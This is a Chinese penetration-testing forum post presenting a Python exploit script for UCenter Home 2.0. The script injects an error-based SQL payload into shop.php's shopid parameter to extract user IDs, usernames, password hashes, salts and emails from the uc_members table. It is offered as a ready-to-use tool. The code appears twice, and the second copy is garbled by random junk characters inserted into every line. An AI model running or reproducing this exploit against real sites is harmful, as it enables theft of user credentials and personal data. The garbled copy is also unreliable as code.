找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2089|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
  X3 o& d  u' |1 a1 x# K/ g* V( ?
! M& c- K3 N! Y
* T( H1 I8 n9 V  f% R' U) D#!/usr/bin/env python  . L$ G! ^- N5 {+ m7 j

1 _; c3 k0 }# rimport sys  
0 y2 r( q% I, e5 yimport urllib2  
3 Y4 ^0 U! n. t. ~import re  $ r- b5 f0 {. K1 f; x  V
$ Q) E, d& |3 {0 q
def info():  0 K% h5 G9 X) b
    print 'From:http://www.exploit-db.com/exploits/14997/'
$ f" o; Y9 N" V6 [6 P+ w! \8 Z    print 'http://www.hake.cc/Web_loudong/' ( z5 f- _4 E0 @$ Z% w1 ?- U
    print 'changed:qiaoy'  $ [; f$ d% T  W+ W, n
    print 'exp:'  8 l( `6 c; X0 ~
    print ' ./UCenter_Home_2.0.py site'  3 i# h; p( `7 K
% G- C4 I' o, \
def main():  
! ?0 ]% Y5 g* F8 P    if len(sys.argv) != 2:  
" t+ d; G; a# f: S( q7 t9 w3 z        info()  
* H* y" V8 L/ w6 j' f9 ~    else:  5 C! F# @. ~& @& c
        site = sys.argv[1]  + N) A; [8 q8 n
        if site[0:7] == 'http://':  . g' ^8 R0 f) u& {' w1 j& k5 p: Q6 P
            sitesite =site  
% u$ S/ s+ H+ m% d. C        elif site[0:8] == 'https://':  
. o; V7 S* N' K% x            sitesite = site  / g+ Q0 i4 K6 G9 Y( i
        else:  
" f6 w2 k3 W7 h7 K" X/ E            site = 'http://'+site  
2 H# D6 c: o9 g) Z7 w8 h& u+ W; X        try:  
- h9 j' R% b5 z0 \$ w5 q) `            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  8 _' r% L2 o8 n3 |6 p
            Value = urllib2.urlopen(url).read()  ' n$ `2 |8 v, n1 r. d& E
            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  
; b% Z( h. S5 e  v1 P: D2 O            hacked = Msg.split(':')  
% d1 E) `3 e+ K7 ]            print 'Name:    '+hacked[1]  
& ]% p9 m2 c: T% h/ @9 ]& c. c            print 'Passwd:  '+hacked[2]  
+ t# x0 S! h5 G: u" y4 P0 R            print 'salt:    '+hacked[3]  
' h  Z* t( y6 W3 V; K. i            print 'email:   '+hacked[4]  
+ Z4 a4 }6 b* \        except:  % ?: Z4 ^- A: @1 I! Y! ?
            print 'Sorry,I can\'t work............'  - g! Y- }$ \. j- D9 F! ]

1 v9 G# @# Y  @6 c* zif __name__ == '__main__':    P& S' Z; C% [7 |
    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表